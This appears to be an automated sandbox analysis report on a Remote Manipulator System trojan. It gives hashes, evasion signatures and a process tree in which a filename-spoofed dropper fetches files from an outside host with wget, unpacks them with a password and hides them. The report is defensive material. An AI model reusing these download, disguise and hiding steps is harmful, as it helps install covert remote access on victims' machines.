rms | a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85

Analysis

max time kernel
139s
max time network
174s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
27-11-2022 11:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85.exe
Size

1.2MB
MD5

dceb5dd827f2e4b5ebec62148ad5d369
SHA1

8ca65ba8cff5ad56f9469c99c09df51ceb8c673f
SHA256

a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85
SHA512

68132010ce7a496f80b94b773fc49d818dc2c90ac56a0ba3429237f4315af488dea336ad387202f770be4144b6d631816da702705c66f93512aa1679a242514e
SSDEEP

24576:baUxvxK4FrkaZYDch6nRpjGjRXKe9/EtkhaEYW9RR3eBTFnI5gg:9JKcZY4h6nmRpSTmX3U5Ih

Score

10^/10

rms evasion rat trojan upx

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Executes dropped EXE 4 IoCs

Processes:

scr‮gnp.scrwget.exewget.exe7z.exe

pid process

428 scr‮gnp.scr
1280 wget.exe
752 wget.exe
1940 7z.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1772 attrib.exe

pid	process
428	scr‮gnp.scr
1280	wget.exe
752	wget.exe
1940	7z.exe

pid	process
1772	attrib.exe

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\exes\wget.exe	upx
\Users\Admin\AppData\Local\Temp\exes\wget.exe	upx
C:\Users\Admin\AppData\Local\Temp\exes\wget.exe	upx
\Users\Admin\AppData\Local\Temp\exes\wget.exe	upx
behavioral1/memory/1280-94-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/1280-244-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
\Users\Admin\AppData\Local\Temp\exes\wget.exe	upx
C:\Users\Admin\AppData\Local\Temp\exes\wget.exe	upx
\Users\Admin\AppData\Local\Temp\exes\wget.exe	upx
behavioral1/memory/752-252-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/800-251-0x00000000004F0000-0x00000000005DF000-memory.dmp	upx
behavioral1/memory/752-319-0x0000000000400000-0x00000000004EF000-memory.dmp	upx

Loads dropped DLL 9 IoCs

Processes:

a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85.execmd.exe

pid	process
1768	a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85.exe
1768	a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85.exe
1768	a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85.exe
800	cmd.exe
800	cmd.exe
800	cmd.exe
800	cmd.exe
800	cmd.exe
800	cmd.exe

Drops file in Windows directory 1 IoCs

Processes:

cmd.exe

description ioc process

File created C:\Windows\control.ini cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

844 timeout.exe
1516 timeout.exe
1916 timeout.exe
1888 timeout.exe

description	ioc	process
File created	C:\Windows\control.ini	cmd.exe

pid	process
844	timeout.exe
1516	timeout.exe
1916	timeout.exe
1888	timeout.exe

Enumerates processes with tasklist 1 TTPs 64 IoCs

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	process
528	tasklist.exe
1496	tasklist.exe
664	tasklist.exe
1820	tasklist.exe
1820	tasklist.exe
304	tasklist.exe
1000	tasklist.exe
1940	tasklist.exe
652	tasklist.exe
1012	tasklist.exe
1828	tasklist.exe
1576	tasklist.exe
1332	tasklist.exe
596	tasklist.exe
1076	tasklist.exe
1772	tasklist.exe
1332	tasklist.exe
1544	tasklist.exe
664	tasklist.exe
328	tasklist.exe
1992	tasklist.exe
1648	tasklist.exe
1888	tasklist.exe
1968	tasklist.exe
1576	tasklist.exe
1872	tasklist.exe
1828	tasklist.exe
1872	tasklist.exe
1628	tasklist.exe
1992	tasklist.exe
1316	tasklist.exe
560	tasklist.exe
864	tasklist.exe
1636	tasklist.exe
1716	tasklist.exe
1716	tasklist.exe
1276	tasklist.exe
1828	tasklist.exe
1544	tasklist.exe
432	tasklist.exe
1580	tasklist.exe
1012	tasklist.exe
1316	tasklist.exe
2016	tasklist.exe
1544	tasklist.exe
1716	tasklist.exe
1684	tasklist.exe
1820	tasklist.exe
328	tasklist.exe
1600	tasklist.exe
1052	tasklist.exe
1656	tasklist.exe
1012	tasklist.exe
752	tasklist.exe
308	tasklist.exe
964	tasklist.exe
964	tasklist.exe
1404	tasklist.exe
1172	tasklist.exe
1940	tasklist.exe
924	tasklist.exe
588	tasklist.exe
908	tasklist.exe
328	tasklist.exe

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1736 taskkill.exe
1296 taskkill.exe
Runs .reg file with regedit 1 IoCs

Processes:

regedit.exe

pid process

528 regedit.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1140 PING.EXE

pid	process
1736	taskkill.exe
1296	taskkill.exe

pid	process
528	regedit.exe

pid	process
1140	PING.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

description	pid	process
Token: SeDebugPrivilege	1736	taskkill.exe
Token: SeDebugPrivilege	1296	taskkill.exe
Token: SeDebugPrivilege	1544	tasklist.exe
Token: SeDebugPrivilege	1772	tasklist.exe
Token: SeDebugPrivilege	752	tasklist.exe
Token: SeDebugPrivilege	1792	tasklist.exe
Token: SeDebugPrivilege	908	tasklist.exe
Token: SeDebugPrivilege	432	tasklist.exe
Token: SeDebugPrivilege	1712	tasklist.exe
Token: SeDebugPrivilege	2016	tasklist.exe
Token: SeDebugPrivilege	1576	tasklist.exe
Token: SeDebugPrivilege	1332	tasklist.exe
Token: SeDebugPrivilege	1580	tasklist.exe
Token: SeDebugPrivilege	528	tasklist.exe
Token: SeDebugPrivilege	1648	tasklist.exe
Token: SeDebugPrivilege	1736	tasklist.exe
Token: SeDebugPrivilege	1888	tasklist.exe
Token: SeDebugPrivilege	1496	tasklist.exe
Token: SeDebugPrivilege	588	tasklist.exe
Token: SeDebugPrivilege	1636	tasklist.exe
Token: SeDebugPrivilege	1544	tasklist.exe
Token: SeDebugPrivilege	1968	tasklist.exe
Token: SeDebugPrivilege	1172	tasklist.exe
Token: SeDebugPrivilege	1628	tasklist.exe
Token: SeDebugPrivilege	1992	tasklist.exe
Token: SeDebugPrivilege	308	tasklist.exe
Token: SeDebugPrivilege	1716	tasklist.exe
Token: SeDebugPrivilege	1316	tasklist.exe
Token: SeDebugPrivilege	1576	tasklist.exe
Token: SeDebugPrivilege	1436	tasklist.exe
Token: SeDebugPrivilege	1012	tasklist.exe
Token: SeDebugPrivilege	560	tasklist.exe
Token: SeDebugPrivilege	924	tasklist.exe
Token: SeDebugPrivilege	1000	tasklist.exe
Token: SeDebugPrivilege	1820	tasklist.exe
Token: SeDebugPrivilege	1860	tasklist.exe
Token: SeDebugPrivilege	1716	tasklist.exe
Token: SeDebugPrivilege	864	tasklist.exe
Token: SeDebugPrivilege	328	tasklist.exe
Token: SeDebugPrivilege	652	tasklist.exe
Token: SeDebugPrivilege	1012	tasklist.exe
Token: SeDebugPrivilege	1172	tasklist.exe
Token: SeDebugPrivilege	924	tasklist.exe
Token: SeDebugPrivilege	964	tasklist.exe
Token: SeDebugPrivilege	1820	tasklist.exe
Token: SeDebugPrivilege	1828	tasklist.exe
Token: SeDebugPrivilege	1716	tasklist.exe
Token: SeDebugPrivilege	1316	tasklist.exe
Token: SeDebugPrivilege	328	tasklist.exe
Token: SeDebugPrivilege	1332	tasklist.exe
Token: SeDebugPrivilege	1684	tasklist.exe
Token: SeDebugPrivilege	1544	tasklist.exe
Token: SeDebugPrivilege	664	tasklist.exe
Token: SeDebugPrivilege	964	tasklist.exe
Token: SeDebugPrivilege	1820	tasklist.exe
Token: SeDebugPrivilege	1828	tasklist.exe
Token: SeDebugPrivilege	1716	tasklist.exe
Token: SeDebugPrivilege	1316	tasklist.exe
Token: SeDebugPrivilege	328	tasklist.exe
Token: SeDebugPrivilege	1872	tasklist.exe
Token: SeDebugPrivilege	1276	tasklist.exe
Token: SeDebugPrivilege	596	tasklist.exe
Token: SeDebugPrivilege	1544	tasklist.exe
Token: SeDebugPrivilege	664	tasklist.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85.exescr‮gnp.scrWScript.execmd.exeWScript.exe

description	pid	process	target process
PID 1768 wrote to memory of 428	1768	a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85.exe	scr‮gnp.scr
PID 1768 wrote to memory of 428	1768	a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85.exe	scr‮gnp.scr
PID 1768 wrote to memory of 428	1768	a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85.exe	scr‮gnp.scr
PID 1768 wrote to memory of 428	1768	a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85.exe	scr‮gnp.scr
PID 1768 wrote to memory of 428	1768	a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85.exe	scr‮gnp.scr
PID 1768 wrote to memory of 428	1768	a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85.exe	scr‮gnp.scr
PID 1768 wrote to memory of 428	1768	a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85.exe	scr‮gnp.scr
PID 428 wrote to memory of 1800	428	scr‮gnp.scr	WScript.exe
PID 428 wrote to memory of 1800	428	scr‮gnp.scr	WScript.exe
PID 428 wrote to memory of 1800	428	scr‮gnp.scr	WScript.exe
PID 428 wrote to memory of 1800	428	scr‮gnp.scr	WScript.exe
PID 428 wrote to memory of 1800	428	scr‮gnp.scr	WScript.exe
PID 428 wrote to memory of 1800	428	scr‮gnp.scr	WScript.exe
PID 428 wrote to memory of 1800	428	scr‮gnp.scr	WScript.exe
PID 1800 wrote to memory of 1540	1800	WScript.exe	cmd.exe
PID 1800 wrote to memory of 1540	1800	WScript.exe	cmd.exe
PID 1800 wrote to memory of 1540	1800	WScript.exe	cmd.exe
PID 1800 wrote to memory of 1540	1800	WScript.exe	cmd.exe
PID 1800 wrote to memory of 1540	1800	WScript.exe	cmd.exe
PID 1800 wrote to memory of 1540	1800	WScript.exe	cmd.exe
PID 1800 wrote to memory of 1540	1800	WScript.exe	cmd.exe
PID 1540 wrote to memory of 1584	1540	cmd.exe	reg.exe
PID 1540 wrote to memory of 1584	1540	cmd.exe	reg.exe
PID 1540 wrote to memory of 1584	1540	cmd.exe	reg.exe
PID 1540 wrote to memory of 1584	1540	cmd.exe	reg.exe
PID 1540 wrote to memory of 1584	1540	cmd.exe	reg.exe
PID 1540 wrote to memory of 1584	1540	cmd.exe	reg.exe
PID 1540 wrote to memory of 1584	1540	cmd.exe	reg.exe
PID 1540 wrote to memory of 1736	1540	cmd.exe	taskkill.exe
PID 1540 wrote to memory of 1736	1540	cmd.exe	taskkill.exe
PID 1540 wrote to memory of 1736	1540	cmd.exe	taskkill.exe
PID 1540 wrote to memory of 1736	1540	cmd.exe	taskkill.exe
PID 1540 wrote to memory of 1736	1540	cmd.exe	taskkill.exe
PID 1540 wrote to memory of 1736	1540	cmd.exe	taskkill.exe
PID 1540 wrote to memory of 1736	1540	cmd.exe	taskkill.exe
PID 1540 wrote to memory of 1296	1540	cmd.exe	taskkill.exe
PID 1540 wrote to memory of 1296	1540	cmd.exe	taskkill.exe
PID 1540 wrote to memory of 1296	1540	cmd.exe	taskkill.exe
PID 1540 wrote to memory of 1296	1540	cmd.exe	taskkill.exe
PID 1540 wrote to memory of 1296	1540	cmd.exe	taskkill.exe
PID 1540 wrote to memory of 1296	1540	cmd.exe	taskkill.exe
PID 1540 wrote to memory of 1296	1540	cmd.exe	taskkill.exe
PID 1540 wrote to memory of 1888	1540	cmd.exe	timeout.exe
PID 1540 wrote to memory of 1888	1540	cmd.exe	timeout.exe
PID 1540 wrote to memory of 1888	1540	cmd.exe	timeout.exe
PID 1540 wrote to memory of 1888	1540	cmd.exe	timeout.exe
PID 1540 wrote to memory of 1888	1540	cmd.exe	timeout.exe
PID 1540 wrote to memory of 1888	1540	cmd.exe	timeout.exe
PID 1540 wrote to memory of 1888	1540	cmd.exe	timeout.exe
PID 1540 wrote to memory of 1496	1540	cmd.exe	WScript.exe
PID 1540 wrote to memory of 1496	1540	cmd.exe	WScript.exe
PID 1540 wrote to memory of 1496	1540	cmd.exe	WScript.exe
PID 1540 wrote to memory of 1496	1540	cmd.exe	WScript.exe
PID 1540 wrote to memory of 1496	1540	cmd.exe	WScript.exe
PID 1540 wrote to memory of 1496	1540	cmd.exe	WScript.exe
PID 1540 wrote to memory of 1496	1540	cmd.exe	WScript.exe
PID 1540 wrote to memory of 844	1540	cmd.exe	timeout.exe
PID 1540 wrote to memory of 844	1540	cmd.exe	timeout.exe
PID 1540 wrote to memory of 844	1540	cmd.exe	timeout.exe
PID 1540 wrote to memory of 844	1540	cmd.exe	timeout.exe
PID 1540 wrote to memory of 844	1540	cmd.exe	timeout.exe
PID 1540 wrote to memory of 844	1540	cmd.exe	timeout.exe
PID 1540 wrote to memory of 844	1540	cmd.exe	timeout.exe
PID 1496 wrote to memory of 800	1496	WScript.exe	cmd.exe

Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exe

pid process

1772 attrib.exe
1068 attrib.exe
888 attrib.exe

pid	process
1772	attrib.exe
1068	attrib.exe
888	attrib.exe

C:\Users\Admin\AppData\Local\Temp\a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85.exe
"C:\Users\Admin\AppData\Local\Temp\a985c8a5431dac7cf4e7943259bd4efc32d4ad35e5c53fec25ec093065875a85.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1768

C:\Users\Admin\AppData\Local\Temp\exes\scr‮gnp.scr
"C:\Users\Admin\AppData\Local\Temp\exes\scr‮gnp.scr" /S
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:428

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\exes\io.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:1800

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\exes\setup.bat" "
4⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1540

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
5⤵
PID:1584

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rfusclient.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1736

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rutserv.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1296

C:\Windows\SysWOW64\timeout.exe
timeout 2
5⤵
- Delays execution with timeout.exe
PID:1888

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\exes\bat.vbs"
5⤵
- Suspicious use of WriteProcessMemory
PID:1496

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\exes\bat.bat" "
6⤵
- Loads dropped DLL
PID:800

C:\Windows\SysWOW64\PING.EXE
ping xnext.esy.es -n setup
7⤵
- Runs ping.exe
PID:1140

C:\Users\Admin\AppData\Local\Temp\exes\wget.exe
wget.exe http://xnext.esy.es/files_7z/files.part
7⤵
- Executes dropped EXE
PID:1280

C:\Users\Admin\AppData\Local\Temp\exes\wget.exe
wget.exe http://xnext.esy.es/reg_users/7/regedit.reg
7⤵
- Executes dropped EXE
PID:752

C:\Users\Admin\AppData\Local\Temp\exes\7z.exe
7z.exe x -y -p1895 files.7z
7⤵
- Executes dropped EXE
PID:1940

C:\Windows\SysWOW64\timeout.exe
timeout 2
5⤵
- Delays execution with timeout.exe
PID:844

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1544

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1436

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1608

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:752

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1780

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1792

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1276

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:908

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1912

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:432

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:308

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1860

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2016

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:304

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1576

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1140

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1332

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1776

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1580

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1656

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:528

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:560

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1648

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1584

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1736

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1840

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1888

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:540

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1496

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1796

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:588

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:844

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1636

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1260

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1544

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1436

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1968

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1772

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1172

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:752

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1628

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:572

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:908

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:308

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1764

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1548

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1316

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1996

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1576

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1480

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
PID:1940

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1332

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1436

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1600

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1012

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1772

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:560

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1532

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:924

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1584

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1000

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:876

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1820

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1240

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1860

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1712

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:304

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:864

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1516

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:328

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1576

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
PID:1940

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1332

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:652

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1600

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1012

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1772

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1172

C:\Windows\SysWOW64\findstr.exe
findstr /i "wget.exe"
5⤵
PID:1532

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq wget.exe" /NH
5⤵
